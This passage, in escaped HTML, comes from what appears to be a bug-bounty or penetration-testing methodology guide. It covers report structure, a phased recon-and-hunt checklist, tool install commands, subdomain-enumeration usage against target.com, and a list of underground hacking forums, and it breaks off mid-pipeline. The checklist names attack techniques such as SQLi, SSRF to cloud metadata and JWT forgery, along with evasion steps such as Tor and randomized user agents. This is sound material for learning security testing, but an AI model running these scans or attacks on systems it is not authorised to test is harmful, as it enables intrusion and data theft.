&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;ldquo;Broken Access Control in Cloud Functions allows Mass Data Deletion at admin-17e4f&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&amp;ldquo;Public Firestore Database exposes 204K WhatsApp Conversations at {projeto}&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&amp;ldquo;JWT Secret Hardcoded in JS Bundle allows Token Forgery at app.target.com&amp;rdquo;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="274-report-structure" &gt;
&lt;div&gt;
&lt;a href="#274-report-structure"&gt;
##
&lt;/a&gt;
27.4 Report Structure
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;1. Summary (1-2 impact sentences)
2. Steps to Reproduce (curl commands, exact requests, responses)
3. Proof of Concept (screenshots, evidence)
4. Impact (real data affected, number of users, business risk)
5. Remediation (concrete fix suggestion)
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="28-final-checklist" &gt;
&lt;div&gt;
&lt;a href="#28-final-checklist"&gt;
#
&lt;/a&gt;
28. FINAL CHECKLIST
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="pre-engagement" &gt;
&lt;div&gt;
&lt;a href="#pre-engagement"&gt;
##
&lt;/a&gt;
Pre-Engagement
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] Define scope (IPs, domains, ranges, exclusions)
[ ] Configure VPN/Tor/proxy
[ ] Check if IP is not leaking (ipleak.net)
[ ] Rotate User-Agent and configure random delays
[ ] Subdomain, common password, and path wordlists
[ ] Automation scripts ready
[ ] GitHub token configured (if doing code search)
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="recon--phase-1-passive" &gt;
&lt;div&gt;
&lt;a href="#recon--phase-1-passive"&gt;
##
&lt;/a&gt;
Recon — Phase 1 (Passive)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] crt.sh → subdomains
[ ] Google dorks → secrets, .env, credentials
[ ] Shodan → infrastructure
[ ] DNS (A, AAAA, MX, NS, TXT, CNAME, SOA)
[ ] DMARC, SPF, DKIM
[ ] GitHub code search → leaks
[ ] Wayback Machine → historical URLs
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="recon--phase-2-active" &gt;
&lt;div&gt;
&lt;a href="#recon--phase-2-active"&gt;
##
&lt;/a&gt;
Recon — Phase 2 (Active)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] Port scan (RustScan/Masscan) → open ports
[ ] .env + .git + Dockerfile + storage/ on all endpoints
[ ] JS bundles → API keys, JWTs, Firebase configs
[ ] Source maps → source code
[ ] CORS → origin reflection test
[ ] Cache headers → WCD/WCP candidates
[ ] Virtual host enumeration
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="hunt--phase-3" &gt;
&lt;div&gt;
&lt;a href="#hunt--phase-3"&gt;
##
&lt;/a&gt;
Hunt — Phase 3
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] WordPress: REST API, XML-RPC, wp-login, plugins
[ ] Laravel: .env, logs, Telescope, Horizon, debug
[ ] Spring Boot: actuators, swagger, H2 console
[ ] Firebase: signUp, Firestore, Storage, RTDB
[ ] Supabase: anon key, RLS bypass, storage
[ ] Cloud Functions: GET/POST/DELETE without auth
[ ] S3/MinIO: public listing, upload
[ ] APIs: auth bypass, IDOR, mass assignment
[ ] JWT: decode, alg=none, weak secret, key confusion
[ ] WCD/WCP: cache deception, cache poisoning
[ ] SQLi: time-based blind on all logins
[ ] SSRF: cloud metadata, internal endpoints
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="report--phase-4" &gt;
&lt;div&gt;
&lt;a href="#report--phase-4"&gt;
##
&lt;/a&gt;
Report — Phase 4
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;[ ] 7-Question Gate → PASS on all
[ ] Screenshots and evidence captured
[ ] PII redacted in screenshots
[ ] Reproducible PoC (exact command)
[ ] Real impact documented (number of records, data type)
[ ] Fix recommendation included
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="29-essential-tools" &gt;
&lt;div&gt;
&lt;a href="#29-essential-tools"&gt;
#
&lt;/a&gt;
29. ESSENTIAL TOOLS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="recon--subdomains" &gt;
&lt;div&gt;
&lt;a href="#recon--subdomains"&gt;
##
&lt;/a&gt;
Recon &amp;amp; Subdomains
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;SimpleReconSubdomain&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;50 sources (39 passive + 11 active), async, multi-output&lt;/td&gt;
&lt;td&gt;&lt;code&gt;git clone https://github.com/MrCl0wnLab/SimpleReconSubdomain &amp;amp;&amp;amp; pip install -r requirements.txt&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;subfinder&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Subdomain discovery&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;amass&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full recon (ASN/Whois)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/owasp-amass/amass/v4/...@master&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;httpx&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HTTP probe (which subdomains respond)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;dnsx&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;DNS toolkit&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="simplereconsubdomain--the-most-complete-subdomain-recon-tool" &gt;
&lt;div&gt;
&lt;a href="#simplereconsubdomain--the-most-complete-subdomain-recon-tool"&gt;
###
&lt;/a&gt;
SimpleReconSubdomain — The Most Complete Subdomain Recon Tool
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;With 50 sources (39 passive + 11 active) in async Python, it is the most comprehensive tool for subdomain enumeration. Does not depend on external binaries.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Installation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/MrCl0wnLab/SimpleReconSubdomain
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;cd&lt;/span&gt; SimpleReconSubdomain
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Configure API keys in config/api_keys.json:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# alienvault_otx, virustotal, securitytrails, shodan, censys_id/secret,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# github_token, chaos_key, leakix_token, fullhunt_token, intelx_key,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# publicwww_key, bevigil_key, hunterhow_key, merklemap_key, fofa_key, netlas_key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Basic usage&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Fast profile (only no-auth sources)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --profile fast
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# OSINT profile + live verification + takeover detection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --profile osint --verify-live
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# With brute-force + two-pass validation (PureDNS-style)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --brute wordlists/subdomains-top1million-20000.txt &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --resolvers https://public-dns.info/nameservers-all.txt &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --check-resolvers --validate-resolvers --threads &lt;span style="color:#ef9f76"&gt;30&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# NDJSON output (pipe-friendly with jq)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --verify-live -o ndjson | jq &lt;span style="color:#a6d189"&gt;&amp;#39;select(.takeover != null)&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Continuous monitoring (internal cron, no systemd)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --profile fast --db target.db --quiet &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; --watch-add &lt;span style="color:#a6d189"&gt;&amp;#34;0,15,30,45 * * * *&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py --watch &lt;span style="color:#737994;font-style:italic"&gt;# starts the scheduler&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Interactive network map (vis.js) with all targets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --verify-live -o html --outfile map.html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Markdown report ready for client&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python simplerecon.py -d target.com --verify-live -o markdown --outfile report.md
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Active sources included&lt;/strong&gt; (do not make requests to the target, but legitimate DNS queries):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nsec_walk&lt;/code&gt; — DNSSEC NSEC zone walking (enumerates entire zone without zone transfer)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;srv_enum&lt;/code&gt; — ~70 SRV prefixes (_http._tcp, _ldap._tcp, _kerberos._tcp&amp;hellip;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;spider&lt;/code&gt; — BFS crawler with sourcemap mining&lt;/li&gt;
&lt;li&gt;&lt;code&gt;robots_sitemap&lt;/code&gt; — recursive robots.txt + sitemap.xml&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ptr_sweep&lt;/code&gt; — PTR sweep on target IP /24s&lt;/li&gt;
&lt;li&gt;&lt;code&gt;asn_sweep&lt;/code&gt; — ASN lookup → all CIDRs → PTR sweep&lt;/li&gt;
&lt;li&gt;&lt;code&gt;vhost_probe&lt;/code&gt; — Virtual host brute-force (130+ words)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;caa_enum&lt;/code&gt; — CAA iodef mining (leaks internal hostnames)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dns_mining&lt;/code&gt; — SPF/DMARC/MX record mining&lt;/li&gt;
&lt;li&gt;&lt;code&gt;zone_transfer&lt;/code&gt; — AXFR on all nameservers&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ns_brute&lt;/code&gt; — Secondary NS discovery&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Takeover detection&lt;/strong&gt;: 22 services (aws-s3, github-pages, heroku, netlify, fastly, shopify&amp;hellip;), 11 WAF/CDN fingerprints (cloudflare, akamai, cloudfront, incapsula&amp;hellip;).&lt;/p&gt;
&lt;h4 id="forum--underground-intelligence-hunting" &gt;
&lt;div&gt;
&lt;a href="#forum--underground-intelligence-hunting"&gt;
###
&lt;/a&gt;
Forum &amp;amp; Underground Intelligence Hunting
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;For CTI (Cyber Threat Intelligence), identify forums where target data may be sold:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List of underground hacking forums for monitoring:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;forums &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;xss.is&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;ramp4u.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;breachforums.st&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;exploit.in&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sinister.ly&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;nulled.to&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;cracked.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;leakbase.io&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;darkforums.net&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;evilzone.org&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;hackforums.net&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;lolz.live&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;procrdmx.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;turk-hackteam.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;validmarket.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;craxpro.io&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;voided.to&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search techniques on these forums:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Google dork: site:forum.com &amp;#34;target.com&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Telegram: search for &amp;#34;target.com&amp;#34; in leak channels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Twitter/X: search for &amp;#34;target.com breach&amp;#34; OR &amp;#34;target.com leak&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Ahmia: search the dark web&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;⚠️ ETHICAL USE&lt;/strong&gt;: For defensive research and CTI only. Never participate in illegal activities. Use isolated VMs only.&lt;/p&gt;
&lt;h3 id="scanning" &gt;
&lt;div&gt;
&lt;a href="#scanning"&gt;
##
&lt;/a&gt;
Scanning
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RustScan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fast port scan&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cargo install rustscan&lt;/code&gt; or Docker &lt;code&gt;rustscan/rustscan:2.1.1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Internet-scale port scan&lt;/td&gt;
&lt;td&gt;&lt;code&gt;git clone https://github.com/robertdavidgraham/masscan &amp;amp;&amp;amp; make&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Deep enumeration&lt;/td&gt;
&lt;td&gt;&lt;code&gt;apt install nmap&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="secret-scanning" &gt;
&lt;div&gt;
&lt;a href="#secret-scanning"&gt;
##
&lt;/a&gt;
Secret Scanning
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;trufflehog&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Secret scan in repositories&lt;/td&gt;
&lt;td&gt;&lt;code&gt;pip install trufflehog&lt;/code&gt; or Docker&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;gitleaks&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Git secret detection&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/gitleaks/gitleaks/v8@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;git-hound&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Git commit dorking&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/tillson/git-hound@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="web--api" &gt;
&lt;div&gt;
&lt;a href="#web--api"&gt;
##
&lt;/a&gt;
Web &amp;amp; API
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;katana&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fast web crawler&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/projectdiscovery/katana/cmd/katana@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;waybackurls&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Wayback historical URLs&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/tomnomnom/waybackurls@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;gau&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Get All URLs&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/lc/gau/v2/cmd/gau@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ffuf&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Web fuzzing&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/ffuf/ffuf/v2@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;nuclei&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Vulnerability scanning&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;wpscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;WordPress scanner&lt;/td&gt;
&lt;td&gt;&lt;code&gt;gem install wpscan&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="cloud" &gt;
&lt;div&gt;
&lt;a href="#cloud"&gt;
##
&lt;/a&gt;
Cloud
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Usage&lt;/th&gt;
&lt;th&gt;Installation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;cloudfox&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AWS/GCP/Azure enumeration&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/BishopFox/cloudfox@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;s3scanner&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Open S3 buckets&lt;/td&gt;
&lt;td&gt;&lt;code&gt;go install github.com/sa7mon/s3scanner@latest&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="ideal-pipeline" &gt;
&lt;div&gt;
&lt;a href="#ideal-pipeline"&gt;
##
&lt;/a&gt;
Ideal Pipeline
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Subdomains&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;subfinder -d target.com | httpx -o alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cat alive.txt | &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; url; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rustscan -a &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$url&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; -p 21,22,80,443,3000,3306,5000,5432,6379,8080,8443,9000,9090,27017
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Historical URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gau target.com | grep -E &lt;span style="color:#a6d189"&gt;&amp;#34;\.env|\.git|api|admin|storage|wp-json|graphql&amp;#34;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Vulnerability scan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nuclei -l alive.txt -t ~/nuclei-templates/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Crawler&lt;/span&gt;
